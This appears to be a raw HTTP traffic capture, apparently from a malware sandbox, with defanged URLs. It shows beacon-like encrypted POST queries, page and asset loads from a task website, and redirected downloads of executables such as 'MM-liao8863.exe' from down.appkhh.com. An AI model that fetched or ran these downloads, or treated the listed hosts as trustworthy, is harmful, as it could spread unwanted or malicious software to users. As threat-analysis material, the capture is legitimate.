....9@k..?.............#..#.-C.Q:....r.....].G...pO..Q@......2.\........un.Z5.wC.J.>I..!@(...*......./^..7g.g.'....../.L.J.{.G}....Hq....e.4.%."..3......e....i.|..d.8.9..G...L....z......}..@.x'#.<.......%.....E*t.......F....Y.%.....zrzq~3Q0.K....V.)1*.......... ..j....... Z.h..k...v..b.xL..*I.........@v..N?&p...&.....O...........H..-...jO....tN.....@B4vJ.@.....?.1>..
<<< skipped >>>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 131
Connection: Keep-Alive
.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00000046110818948618110713
Server: Apache
tracecode: 00000046110818948618110713
Set-Cookie: BAIDUID=32F3C5706F8B2402C2AC3D655372071C:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 120
Connection: Keep-Alive
.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?#7;"8xjikhs40,....UV_T\Q_E...opqrstuvw
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999768410581376522110712
Server: Apache
tracecode: 35999768410581376522110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B4ADDD1A7D9EA5912:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00063499440581376522110713
Server: Apache
tracecode: 00063499440581376522110713
Set-Cookie: BAIDUID=FD9EDA96E9FFC3CC09AA604EAEAD5BD2:FG=1; expires=Sun, 06-Nov-16 05:00:06 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024854541213477898110713
Server: Apache
tracecode: 00024854541213477898110713
Set-Cookie: BAIDUID=B2053B857F2258D280860D7625D53A9A:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /cgi-bin/report?id=89217 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ui.ptlogin2.qq.com
Connection: Keep-Alive
Cookie: pt_local_token=-1924241393; ptui_qstatus=3
HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sat, 07 Nov 2015 05:00:30 GMT
Pragma: no-cache
Cache-Control: no-cache; must-revalidate
Content-Type: image/bmp;
Content-Length: 66
BMB.......>...(...................................................HTTP/1.1 200 OK..Connection: keep-alive..Keep-Alive: timeout=50, max=1024..Server: QZHTTP-2.38.20..Date: Sat, 07 Nov 2015 05:00:30 GMT..Pragma: no-cache..Cache-Control: no-cache; must-revalidate..Content-Type: image/bmp;..Content-Length: 66..BMB.......>...(.....................................................
GET /View/Home/Task/css.base.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:50 GMT
Content-Type: text/css
Content-Length: 4860
Last-Modified: Mon, 19 Oct 2015 03:49:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "56246855-12fc"
Expires: Sat, 07 Nov 2015 16:59:50 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
html,body {.. overflow-x: hidden;..}..body {.. background: #ebebeb;.. position: relative;...font-family: "Helvetica Neue","Microsoft YaHei","............",Helvetica,Tahoma,Arial,STXihei,sans-serif;..}..a{.. color: #333;..}..a:hover,a:focus {.. color: #f60;.. text-decoration: none;..}..a:focus {.. outline: thin dotted;.. outline: 5px auto -webkit-focus-ring-color;.. outline-offset: -2px;..}../*bootstrap fieldset*/..fieldset{..}..legend{...width:auto;..}../*bootstrap family*/../*model*/...modal-scrollbar-measure {...display:none..}../*bootstrap nav*/...navbar{...margin:0px;...border:none;...border-radius: 0;..}...navbar-inverse .navbar-nav>li>a{.. color: #fff;..}...navbar-inverse .navbar-nav>li>a:hover{.. color: #999;..}...navbar-inverse .navbar-nav>.active>a,...navbar-inverse .navbar-nav>.active>a:focus,...navbar-inverse .navbar-nav>.active>a:hover{.. color: #ddd;.. background-color:#080808;..}...navbar-collapse{...font-size: 1.1em;..}../*bootstrap page*/...pagination > li > a,...pagination > li > span {.. position: relative;.. float: left;.. padding: 6px 12px;.. margin: 0px 5px;.. line-height: 1.45;.. color: #222;.. text-decoration: none;.. background-color: #fff;.. border: 1px solid #ddd;..}...pagination > li.disabled > a{.. font-weight: bold;...}...pagination > li > a:hover,...pagination > li > span:hover,...pagination > li > a:focus,...pagination > li > span:focus {.. color: #2cab93;.. background-color: #eee;..
<<< skipped >>>
GET /View/Home/Task/css.task.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:50 GMT
Content-Type: text/css
Content-Length: 2042
Last-Modified: Mon, 19 Oct 2015 07:02:19 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5624957b-7fa"
Expires: Sat, 07 Nov 2015 16:59:50 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*task inc*/..h4,h4 a{.. color: #F60;..}..h4 a:hover{.. color: #333;..}../*channel/list/tag*/...dc-item li{.. margin-bottom: 20px;.. overflow: hidden;..}...dc-item p{ .. line-height: 2.0;..}...dc-item p.lead{...color: #666;...margin: 0px;...font-size: 1.0em;..}...dc-item p.lead a{...color: #666;...margin-left: 5px;..}...dc-item p.lead a:hover{...color: #017e66;..}...dc-item p.lead .btn-sm{...padding:2px 4px;...margin:2px;..}...dc-item p.info{...color: #888;...font-size: 1.0em;..}...dc-item-hot li{...color: #f60;...padding: 5px 0;..}../*detail*/..a.dc-prev{...margin-right:10px;..}...dc-task{...padding-top:10px;.. margin-bottom: 15px;...color: #333;...font-size: 1.25em;...overflow: hidden;..}...dc-task p{...line-height:1.4em;..}...dc-task .score{...font-size:1.0em;...color:#666;..}...dc-task .score em{...color: #F30;...margin:0 5px;...font-style:normal;...font-size:1.4em;..}...dc-task .cycle{...font-size:1.0em;...color: #F30;...margin:0 5px;...font-weight:normal;..}...dc-task-pad{...padding:40px 0;..}...dc-content{.. margin-bottom: 15px;...font-size: 1.2em;.. line-height: 1.8em;...color: #555;...overflow: hidden;..}...dc-content a{.. color: #f60;..}...dc-content a:hover{.. color: #333;..}...dc-content .nav-tabs{.. margin-top:15px;..}...dc-content .tab-content{.. padding-top: 15px;..}...dc-content .apply{.. padding:20px 0;.. text-align: center;..}...dc-content .dc-image{...margin:0 auto;..}...dc-content table td{.. padding-left: 10px;..}...dc-content pre {...border-radius: 0;.. margin: 1.64em 0;..
<<< skipped >>>
GET /Public/html5shiv/3.7.2/html5shiv.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:51 GMT
Content-Type: application/javascript
Content-Length: 2639
Last-Modified: Sat, 14 Mar 2015 18:06:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "550478a6-a4f"
Expires: Sat, 07 Nov 2015 16:59:51 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/**..* @preserve HTML5 Shiv 3.7.2 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed..*/..!function(a,b){function c(a,b){var c=a.createElement("p"),d=a.getElementsByTagName("head")[0]||a.documentElement;return c.innerHTML="x<style>" b "</style>",d.insertBefore(c.lastChild,d.firstChild)}function d(){var a=t.elements;return"string"==typeof a?a.split(" "):a}function e(a,b){var c=t.elements;"string"!=typeof c&&(c=c.join(" ")),"string"!=typeof a&&(a=a.join(" ")),t.elements=c " " a,j(b)}function f(a){var b=s[a[q]];return b||(b={},r ,a[q]=r,s[r]=b),b}function g(a,c,d){if(c||(c=b),l)return c.createElement(a);d||(d=f(c));var e;return e=d.cache[a]?d.cache[a].cloneNode():p.test(a)?(d.cache[a]=d.createElem(a)).cloneNode():d.createElem(a),!e.canHaveChildren||o.test(a)||e.tagUrn?e:d.frag.appendChild(e)}function h(a,c){if(a||(a=b),l)return a.createDocumentFragment();c=c||f(a);for(var e=c.frag.cloneNode(),g=0,h=d(),i=h.length;i>g;g )e.createElement(h[g]);return e}function i(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createElement=function(c){return t.shivMethods?g(c,a,b):b.createElem(c)},a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&(" d().join().replace(/[\w\-:] /g,function(a){return b.createElem(a),b.frag.createElement(a),'c("' a '")'}) ");return n}")(t,b.frag)}function j(a){a||(a=b);var d=f(a);return!t.shivCSS||k||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,fig
<<< skipped >>>
GET /Public/bootstrap/3.3.5/fonts/glyphicons-halflings-regular.eot? HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:52 GMT
Content-Type: application/vnd.ms-fontobject
Content-Length: 20127
Last-Modified: Tue, 16 Jun 2015 01:13:22 GMT
Connection: keep-alive
ETag: "557f7832-4e9f"
Accept-Ranges: bytes
.N..AM............................LP........................'..,..................(.G.L.Y.P.H.I.C.O.N.S. .H.a.l.f.l.i.n.g.s.....R.e.g.u.l.a.r...x.V.e.r.s.i.o.n. .1...0.0.9.;.P.S. .0.0.1...0.0.9.;.h.o.t.c.o.n.v. .1...0...7.0.;.m.a.k.e.o.t.f...l.i.b.2...5...5.8.3.2.9...8.G.L.Y.P.H.I.C.O.N.S. .H.a.l.f.l.i.n.g.s. .R.e.g.u.l.a.r.....BSGP.....................M..M..F..........(u...<.0D.B/X..N....CC.^...rmR2sk..PJ"5 .gl.W*i.W./E.....4#...U.~.f....UD........J.1./!../...s..7...k.....(...h.N..8o..d$yq..1...9..@.-..HG.....S".Fj....6C3..&......W51.....B..a..QaR.U/..{*......=.@d..h$..1.T..nc c..A......Z...@Q.c.a....l..2>.K....m.' ....C.HM..fB.X.,.Y....p.e......U....*...z..m...i..O1nE.......hx!aC.XT..V...........R....%...|I..H....P.5".b.N....=...r./_.R...._..%...uz.....5.2.....P.)........F.7S..q.F.{n.i.a....@D..s.;...}9....?.........R{.Tk.;.....U\N.Z..Q-.^.s..7.f.0....S3A..._n..`W.7P..p.....i...!.g./._p....Z.-=...~WZ#/.4 KF.`. ...z...0..|.D.........&d..I.......;.M..{'.om..m..I...!w.i9|H:..........{..~...q....O.........,. .L]&.J0...9/...9&.Y.....{;..'.3`..e..@v.H..y.DZ$...3....Dx28....W. Cx5x..w..B`.$C$'..El..y..h.......DJ.$(p.....QA.A..A.@'.$.h.p..0.V.0 `..s..e.$.4$"t2=f..4.A.{Tk..0|r.H........`.L&..s.h.]...A<.....`R.'...!...1N..;.._.t3.#. .......V....*ve.F`E. O$.{).W=p:....F`..2...2..C....^............G..<<?....~z.........>..p..Ne2....... Y.s..l:.........u5.....t.u.^8..6......Tmy.Q.%..u~...%~1r..a.w..^.._.Z..Z.a...0!.......N.`....uq....YB.\................[.e.....:@..J'E...,.3..ubj@.p........f.........eW9(.
<<< skipped >>>
GET /Public/images/sns_qq.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:53 GMT
Content-Type: image/png
Content-Length: 1851
Last-Modified: Tue, 19 May 2015 04:17:19 GMT
Connection: keep-alive
ETag: "555ab94f-73b"
Expires: Mon, 07 Dec 2015 04:59:53 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR.............h.......tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:38F721A94AC711E09F31828F5693D33B" xmpMM:DocumentID="xmp.did:38F721AA4AC711E09F31828F5693D33B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:38F721A74AC711E09F31828F5693D33B" stRef:documentID="xmp.did:38F721A84AC711E09F31828F5693D33B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>_O1.....IDATx.b`..%E..L..z.wU.1........H......My............}C... ...|.............X.....Yy..0GEQ...\I^.?...m...XK....g../...6wY.......)qY....k..W........@..... 9..1_...'.v20..a`......;....}.....jJ.. 2..?5W.................Z..eT.3.L..'.......k.2..}...^.py?..u..F..b...[...*...........0..=..=..?33....(.......x......`D.T108..........5,..v.._$&..:.C...Fcc.....e.5.g..z...w...23D.K2\.r......>{..I....?~............R..s.......V.d`ccc............%........?.1.9...... ...A^..a..{P....P&..2..Q.....VoC\.....^.$..#.1H*.Fbhm].....,.!...&".H..... ...GDiz.n....m...-.....w...........e#`.O..x(...C.R *.......)=
<<< skipped >>>
GET /Public/jquery/1.11.3/jquery.min.js?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:55 GMT
Content-Type: application/javascript
Content-Length: 95992
Last-Modified: Wed, 19 Aug 2015 17:28:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "55d4bcc9-176f8"
Expires: Sat, 07 Nov 2015 16:59:55 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0] |[\s\uFEFF\xA0] $/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c= a (0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},m.extend=m.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h ),"object"==typeof g||m.
<<< skipped >>>
GET /View/Home/Task//base.js?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: application/javascript
Content-Length: 17513
Last-Modified: Mon, 19 Oct 2015 06:32:55 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "56248e97-4469"
Expires: Sat, 07 Nov 2015 16:59:59 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/* @name daicuo.cc base.js..** @lasttime 2015-10-19..** @email 271513820@qq.com..** dc.scroll.page() .............................** dc.scroll.fixed($id,$top,$width) ..............** dc.scroll.totop($id,$top) ........................ ...CSS.......$id..** dc.click.nextpage(); ............(.........)..** dc.click.share(); .dc-share....................** dc.click.collect(); .dc-collect....................** dc.click.down(); .dc-down....................** dc.click.up(); .dc-up....................** dc.click.hits(); .dc-tj..........................** dc.key.down(); ..............** dc.user.islogin() .................. .dc-islogin..** dc.user.login() .................** dc.user.score() ........................ dc-user-score..** dc.task.bind() ............ #dc-task..** dc.load.cms(); ajax..............** dc.load.images(); ....................** dc.load.union($second); ..............** dc.load.hits($id); ....................** dc.cookie.set(name, value, days)..** dc.cookie.get(name)..** dc.cookie.del(name)..*/..dc.scroll = {...'page' : function(){....// ............... $(this).unbind("scroll");....$(window).bind('scroll', function(){.....var nexturl = $("#dc-nextpage").attr('data-href');.....if(nexturl == undefined){......return false;.....}.....var c = $(window).height();.....var t = $(document).scrollTop(); .....var h = $(document).height();.....if( h - t - c == 0 ){......$.get(nexturl (dc.page*1 1), function(data){.......if(data){........// .......................$("#dc-item").append(data);........// ..............
<<< skipped >>>
GET /CSC3-2010.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2010-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "7c8bb8b999f19239c68f0bca1cf9491c:1446844256"
Last-Modified: Fri, 06 Nov 2015 21:10:56 GMT
Date: Sat, 07 Nov 2015 05:00:11 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
00006000..0..D.0..C....0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at https://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 CA..151106210003Z..151120210003Z0..B.0!.....S.@.k....6..c..140730092631Z0!....c..k....D.k.....120708062201Z0!... _...u.t.=.<.&...130218061114Z0!...&..].....P.k.:...120125130117Z0!...7P.x....8.Q...s..130227010252Z0!...J.....Q..Y.[.....110404153956Z0!...d...=..q!_...g9..130729145216Z0!...d....Y.......o...140711083257Z0!...l.....h2<.H......120329152211Z0!...q.9...`H.*.Y.C...120525202212Z0!...s...TM.......0...121221080842Z0!...t..,.. ...eL.....130314222305Z0!...y..r.HW.v.....w..140423054643Z0!..../u.......A..5...101214165045Z0!.....0.Xc...%...iM..121102230226Z0!.......S.a&.X5t.E]..111206083350Z0!....c.(....B.[M83...140108164517Z0!....A.Sv.....f,.....110609003155Z0!.....z......!.ID{]..101228182208Z0!....b^......{d.J'...130102154110Z0!.......n........'u..140521222808Z0!......0..........I..130912181631Z0!.....1.;C,.. L..0...141111073655Z0!....6e...~..T.......130131012247Z0!.....|.....t.l.o....140827175301Z0!.........bD#*u......130226223939Z0!.......@..'$.).;}\..130121172259Z0!....7.v..........n..120724160733Z0!....n[..P..a.y...p..141121045513Z0!....P;.Y..d...c.(...120209181451Z0!.....].bb[.....!....140328205453Z0!.....a...L`..IV.....130402103508Z0!......fFW.z.....@T..130117000242Z0!...........].{7.....120730000000Z0!...".......Z.V.,.e..121031192224Z0!...'....[.1......g..130318195659Z0!...,GI.jH.|.
<<< skipped >>>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00067820760341062666110713
Server: Apache
tracecode: 00067820760341062666110713
Set-Cookie: BAIDUID=FD9EDA96E9FFC3CC3B14288B214300D1:FG=1; expires=Sun, 06-Nov-16 05:00:06 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
Host: 103.7.29.215
HTTP/1.1 200 OK
Server: CDN_NWS_4.2.1
Connection: keep-alive
Date: Sat, 07 Nov 2015 05:00:16 GMT
Cache-Control: max-age=600, s-maxage=60
Expires: Sat, 07 Nov 2015 05:10:16 GMT
Last-Modified: Fri, 08 May 2015 02:43:07 GMT
Content-Type: application/octet-stream
Content-Length: 47240016
X-Cache-Lookup: Hit From Disktank
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)1..mP.KmP.KmP.K...KoP.KJ..KrP.KJ..K.P.KJ..K1P.K._.KhP.K._.KpP.KmP.K.Q.KJ..K.P.KJ..KlP.KJ..KlP.KRichmP.K................PE..L.....#..................p...@....................@...........................$......d...................................................[..............`...............................................@...............t.......@....................text...Yb.......p.................. ..`.rdata...{..........................@..@.data............`..................@....rsrc....[.......`...`..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 120
Connection: Keep-Alive
.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?#7;"8xjikhs40,....UV_T\Q_E...opqrstuvw
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991270750315632138110712
Server: Apache
tracecode: 35991270750315632138110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B9146A82791018378:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /mmliao/MM-liao8863.exe HTTP/1.1
Host: mm.appkhh.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Sat, 07 Nov 2015 05:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: hXXp://down.appkhh.com:9000/mmliaonew/MM-liao8863.exe
Set-Cookie: ASP.NET_SessionId=unvtmf55i2o5pj550p3epgra; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 808
<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://down.appkhh.com:9000/mmliaonew/MM-liao8863.exe">here</a>.</h2>..</body></html>....<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="../download/SubConfig.aspx?id1=8863" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGQiFbVbBJv7A/lcSr1Og9mkU0lctw==" />..</div>..<div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="9F81D7CC" />..</div>.. <div>.. .. </div>.. </form>..</body>..</html>....
GET /v1/t/full/p/mini/tn/10003408/ch_dl_url.exe HTTP/1.1
Host: j.br.baidu.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx/1.4.1
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
